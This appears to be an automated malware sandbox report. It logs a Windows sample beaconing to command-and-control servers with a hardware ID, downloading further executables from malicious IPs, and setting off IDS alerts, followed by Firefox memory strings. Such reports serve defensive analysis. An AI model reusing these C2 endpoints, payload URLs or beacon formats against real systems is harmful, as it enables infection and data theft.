Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 38 30 33 34 41 33 39 36 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"038034A396B03555514232------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"stok------KJKEHIIJJECFHJKECFHD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013565001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 38 30 33 34 41 33 39 36 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 2d 2d 0d 0a Data Ascii: ------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="hwid"038034A396B03555514232------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="build"stok------DHDAFBFCFHIDAKFIIEBA--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49802 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49821 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49832 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49838 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49847 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49853 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49873 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49871 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49866 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49883 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49910 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49939 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49951 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49958 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50011 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50026 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50040 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50048 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50054 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50077 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49932 -> 104.21.32.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A8E0C0 recv,recv,recv,recv, 0_2_00A8E0C0
Source: global traffic HTTP traffic detected: GET /files/7403972632/C1J7SVw.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlYou must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/UPDATE moz_bookmarks SET position = position - 1 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlYou must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/UPDATE moz_bookmarks SET position = position - 1 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/MAX(EXISTS( equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: 